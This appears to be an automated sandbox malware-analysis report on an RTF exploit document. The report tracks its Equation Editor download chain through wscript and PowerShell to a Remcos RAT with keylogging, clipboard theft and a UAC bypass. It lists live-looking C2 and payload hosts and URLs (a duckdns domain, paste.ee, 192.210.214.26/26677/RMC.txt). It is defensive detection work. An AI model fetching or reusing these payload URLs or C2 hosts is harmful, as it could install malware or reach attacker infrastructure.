Source: global traffic	TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443

Networking

Snort IDS alert for network traffic

Source: Traffic	Snort IDS: 2020423 ET CURRENT_EVENTS Unknown EK Landing Feb 16 2015 b64 1 M1 192.210.214.26:80 -> 192.168.2.22:49165
Source: Traffic	Snort IDS: 2020424 ET CURRENT_EVENTS Unknown EK Landing Feb 16 2015 b64 2 M1 192.210.214.26:80 -> 192.168.2.22:49165

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\SysWOW64\wscript.exe	Network Connect: 104.21.84.67 443			Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Domain query: paste.ee

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor

URLs: remcjulia.duckdns.org

Connects to a pastebin service (likely for C&C)

Source: unknown	DNS query: name: paste.ee
Source: unknown	DNS query: name: paste.ee
Source: unknown	DNS query: name: paste.ee
Source: unknown	DNS query: name: paste.ee

Uses dynamic DNS services

Source: unknown

DNS query: name: remcjulia.duckdns.org

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

Code function: 2_2_035C065A URLDownloadToFileW,ShellExecuteW,ExitProcess,

2_2_035C065A

Source: RMCD.vbs.9.dr	Binary string: http://schemas.microsoft.com/wbem/wsman/1/config/service><transport>transport</transport><force/></analyze_input> - obfuscation quality: 4
Source: RMCD.vbs.9.dr	Binary string: http://schemas.microsoft.com/wbem/wsman/1/config/service><transport>transport</transport></analyze_input> - obfuscation quality: 4

Source: global traffic	HTTP traffic detected: GET /images/004/773/797/original/new_image.jpg?1713882029 HTTP/1.1Host: uploaddeimagens.com.brConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /images/004/773/797/original/new_image.jpg?1713882029 HTTP/1.1Host: uploaddeimagens.com.br
Source: global traffic	HTTP traffic detected: GET /26677/RMC.txt HTTP/1.1Host: 192.210.214.26Connection: Keep-Alive

Source: Joe Sandbox View	IP Address: 104.21.84.67 104.21.84.67
Source: Joe Sandbox View	IP Address: 104.21.84.67 104.21.84.67
Source: Joe Sandbox View	IP Address: 172.67.215.45 172.67.215.45

Source: Joe Sandbox View	ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
Source: Joe Sandbox View	ASN Name: AS-COLOCROSSINGUS AS-COLOCROSSINGUS
Source: Joe Sandbox View	ASN Name: AS-COLOCROSSINGUS AS-COLOCROSSINGUS

Source: Joe Sandbox View	JA3 fingerprint: 05af1f5ca1b87cc9cc9b25185115607d
Source: Joe Sandbox View	JA3 fingerprint: 7dcce5b76c8b17472d024758970a406b

Source: global traffic	HTTP traffic detected: GET /d/4yAaN HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: paste.eeConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /26677/IEinternetMonkeykisserpdf.html HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 192.210.214.26Connection: Keep-Alive

Source: unknown

HTTPS traffic detected: 172.67.215.45:443 -> 192.168.2.22:49163 version: TLS 1.0

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

Code function: 2_2_035C065A URLDownloadToFileW,ShellExecuteW,ExitProcess,

2_2_035C065A

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{06EA25DE-75E3-4F72-AE47-A5D92E692285}.tmp

Jump to behavior

Source: global traffic	HTTP traffic detected: GET /d/4yAaN HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: paste.eeConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /images/004/773/797/original/new_image.jpg?1713882029 HTTP/1.1Host: uploaddeimagens.com.brConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /images/004/773/797/original/new_image.jpg?1713882029 HTTP/1.1Host: uploaddeimagens.com.br
Source: global traffic	HTTP traffic detected: GET /26677/IEinternetMonkeykisserpdf.html HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 192.210.214.26Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /26677/RMC.txt HTTP/1.1Host: 192.210.214.26Connection: Keep-Alive

Source: wscript.exe, 00000005.00000002.366574582.0000000004100000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.396299545.0000000004F61000.00000004.00000020.00020000.00000000.sdmp

String found in binary or memory: www.login.yahoo.com0 equals www.yahoo.com (Yahoo)

Source: unknown

DNS traffic detected: queries for: paste.ee

Source: EQNEDT32.EXE, 00000002.00000002.357678904.0000000000524000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://192.210.214.26/26677/IEinternetMonkeykisserpdf.html
Source: EQNEDT32.EXE, 00000002.00000002.358501991.00000000035C0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://192.210.214.26/26677/IEinternetMonkeykisserpdf.htmlj
Source: EQNEDT32.EXE, 00000002.00000002.357678904.000000000052F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://192.210.214.26/26677/IEinternetMonkeykisserpdf.html~~C:
Source: wscript.exe, 00000005.00000002.366574582.0000000004100000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.396299545.0000000004F61000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
Source: wscript.exe, 00000005.00000002.366574582.0000000004100000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.396299545.0000000004F61000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.comodoca.com/UTN-USERFirst-Hardware.crl06
Source: wscript.exe, 00000005.00000002.366574582.0000000004100000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.396299545.0000000004F61000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.entrust.net/2048ca.crl0
Source: wscript.exe, 00000005.00000002.366574582.0000000004100000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.396299545.0000000004F61000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.entrust.net/server1.crl0
Source: wscript.exe, 00000005.00000002.366574582.0000000004100000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.396299545.0000000004F61000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: wscript.exe, 00000005.00000002.366574582.0000000004100000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.396299545.0000000004F61000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0
Source: wscript.exe, 00000005.00000002.366574582.0000000004100000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.396299545.0000000004F61000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.pkioverheid.nl/DomOvLatestCRL.crl0
Source: RegAsm.exe	String found in binary or memory: http://geoplugin.net/json.gp
Source: powershell.exe, 00000008.00000002.391262548.0000000003F96000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000B.00000002.871935224.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://geoplugin.net/json.gp/C
Source: powershell.exe, 00000008.00000002.391075919.000000000039A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://go.microsoft.c
Source: powershell.exe, 00000008.00000002.391262548.00000000032B9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://nuget.org/NuGet.exe
Source: wscript.exe, 00000005.00000002.366574582.0000000004100000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.396299545.0000000004F61000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.comodoca.com0
Source: wscript.exe, 00000005.00000002.366574582.0000000004100000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.396299545.0000000004F61000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.comodoca.com0%
Source: wscript.exe, 00000005.00000002.366574582.0000000004100000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.396299545.0000000004F61000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.comodoca.com0-
Source: wscript.exe, 00000005.00000002.366574582.0000000004100000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.396299545.0000000004F61000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.comodoca.com0/
Source: wscript.exe, 00000005.00000002.366574582.0000000004100000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.396299545.0000000004F61000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.comodoca.com05
Source: wscript.exe, 00000005.00000002.366574582.0000000004100000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.396299545.0000000004F61000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.entrust.net03
Source: wscript.exe, 00000005.00000002.366574582.0000000004100000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.396299545.0000000004F61000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.entrust.net0D
Source: powershell.exe, 00000006.00000002.486553628.000000000232B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.391262548.0000000002291000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: wscript.exe, 00000005.00000002.366574582.0000000004100000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.396299545.0000000004F61000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.digicert.com.my/cps.htm02
Source: wscript.exe, 00000005.00000002.366574582.0000000004100000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.396299545.0000000004F61000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.diginotar.nl/cps/pkioverheid0
Source: wscript.exe, 00000005.00000003.365013968.00000000030A0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.365067449.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000002.366335613.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.365225964.00000000007FB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://analytics.paste.ee
Source: wscript.exe, 00000005.00000003.365013968.00000000030A0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.365067449.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000002.366335613.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.365225964.00000000007FB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://analytics.paste.ee;
Source: wscript.exe, 00000005.00000003.365013968.00000000030A0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.365067449.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000002.366335613.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.365225964.00000000007FB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cdnjs.cloudflare.com
Source: wscript.exe, 00000005.00000003.365013968.00000000030A0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.365067449.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000002.366335613.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.365225964.00000000007FB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cdnjs.cloudflare.com;
Source: powershell.exe, 00000008.00000002.391262548.00000000032B9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000008.00000002.391262548.00000000032B9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000008.00000002.391262548.00000000032B9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/License
Source: wscript.exe, 00000005.00000003.365013968.00000000030A0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.365067449.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000002.366335613.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.365225964.00000000007FB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://fonts.googleapis.com
Source: wscript.exe, 00000005.00000003.365013968.00000000030A0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.365067449.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000002.366335613.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.365225964.00000000007FB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://fonts.gstatic.com;
Source: wscript.exe, 00000005.00000002.366481906.0000000002BEE000.00000004.00000020.00020000.00000000.sdmp, luckymokeykissinglover.vbs.2.dr, IEinternetMonkeykisserpdf[1].htm.2.dr	String found in binary or memory: https://lesferch.github.io/DesktopPic
Source: powershell.exe, 00000008.00000002.391262548.00000000032B9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://nuget.org/nuget.exe
Source: wscript.exe, 00000005.00000003.365225964.0000000000805000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000002.366343739.0000000000805000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.363991257.0000000000815000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://paste.ee/
Source: wscript.exe, 00000005.00000003.365067449.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000002.366335613.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.363991257.0000000000780000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.365225964.00000000007FB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://paste.ee/d/4yAaN
Source: wscript.exe, 00000005.00000003.365013968.00000000030A0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://paste.ee/d/4yAaN=
Source: wscript.exe, 00000005.00000002.366290076.0000000000795000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.363991257.0000000000780000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://paste.ee/d/4yAaNgb
Source: wscript.exe, 00000005.00000002.366574582.0000000004100000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.396299545.0000000004F61000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://secure.comodo.com/CPS0
Source: wscript.exe, 00000005.00000003.365013968.00000000030A0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.365067449.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000002.366335613.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.365225964.00000000007FB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://secure.gravatar.com
Source: wscript.exe, 00000005.00000003.365013968.00000000030A0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.365067449.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000002.366335613.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.365225964.00000000007FB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://themes.googleusercontent.com
Source: powershell.exe, 00000008.00000002.391262548.00000000023CB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://uploaddeimagens.com.br
Source: powershell.exe, 00000008.00000002.391149283.00000000005E0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://uploaddeimagens.com.br/images/004/773/797/original/new_image.jpg?1713882029
Source: wscript.exe, 00000005.00000003.365013968.00000000030A0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.365067449.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000002.366335613.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.365225964.00000000007FB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com
Source: wscript.exe, 00000005.00000003.365013968.00000000030A0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.365067449.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000002.366335613.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.365225964.00000000007FB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com;
Source: wscript.exe, 00000005.00000003.365013968.00000000030A0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.365067449.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000002.366335613.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.365225964.00000000007FB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.gstatic.com

Source: unknown	Network traffic detected: HTTP traffic on port 49163 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49162 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49164 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49164
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49163
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49162

Source: unknown

HTTPS traffic detected: 104.21.84.67:443 -> 192.168.2.22:49162 version: TLS 1.2

Key, Mouse, Clipboard, Microphone and Screen Capturing

Contains functionality to register a low level keyboard hook

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 11_2_0040A2B8 SetWindowsHookExA 0000000D,0040A2A4,00000000

11_2_0040A2B8

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 11_2_0040B70E OpenClipboard,GetClipboardData,CloseClipboard,

11_2_0040B70E

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 11_2_004168C1 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,CloseClipboard,OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,

11_2_004168C1

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 11_2_0040B70E OpenClipboard,GetClipboardData,CloseClipboard,

11_2_0040B70E

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 11_2_0040A3E0 GetForegroundWindow,GetWindowThreadProcessId,GetKeyboardLayout,GetKeyState,GetKeyboardState,ToUnicodeEx,ToUnicodeEx,ToUnicodeEx,ToUnicodeEx,

11_2_0040A3E0

E-Banking Fraud

Yara detected Remcos RAT

Source: Yara match	File source: 11.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.powershell.exe.4179110.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.powershell.exe.4179110.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000B.00000002.872587798.0000000000A01000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.871935224.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.391262548.0000000003F96000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: powershell.exe PID: 2824, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegAsm.exe PID: 3212, type: MEMORYSTR

System Summary

Malicious sample detected (through community Yara rule)

Source: SecuriteInfo.com.Exploit.ShellCode.69.19968.913.rtf, type: SAMPLE	Matched rule: Detects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents. Author: ditekSHen
Source: 11.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 11.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 11.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 8.2.powershell.exe.4179110.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 8.2.powershell.exe.4179110.1.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 8.2.powershell.exe.4179110.1.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 11.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 11.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 11.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 8.2.powershell.exe.4179110.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 8.2.powershell.exe.4179110.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 0000000B.00000002.871935224.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 0000000B.00000002.871935224.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 0000000B.00000002.871935224.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 00000008.00000002.391262548.0000000003F96000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: Process Memory Space: powershell.exe PID: 2040, type: MEMORYSTR	Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: Process Memory Space: powershell.exe PID: 2824, type: MEMORYSTR	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
